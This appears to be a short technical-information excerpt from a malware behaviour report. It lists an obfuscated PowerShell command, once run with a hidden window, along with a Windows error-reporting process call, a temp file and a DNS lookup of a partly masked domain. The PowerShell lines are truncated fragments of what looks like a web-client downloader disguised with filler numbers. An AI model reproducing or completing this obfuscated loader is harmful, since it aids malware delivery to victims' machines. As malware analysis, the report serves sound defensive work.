Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $PUF2eOu = '43870.099038622$R0kA6Hbm = 43870.099038622n43870.099038622e43870.099038622w43870.099038622-obj43870.099038622e43870.099038622c43870.099038622t n43870.099038622e43870.099038622t43870...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1888
- %TEMP%\744779.cvr
- DNS ASK ru##in.gdn
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $PUF2eOu = '43870.099038622$R0kA6Hbm = 43870.099038622n43870.099038622e43870.099038622w43870.099038622-obj43870.099038622e43870.099038622c43870.099038622t n43870.099038622e43870.099038622t43870...' (with hidden window)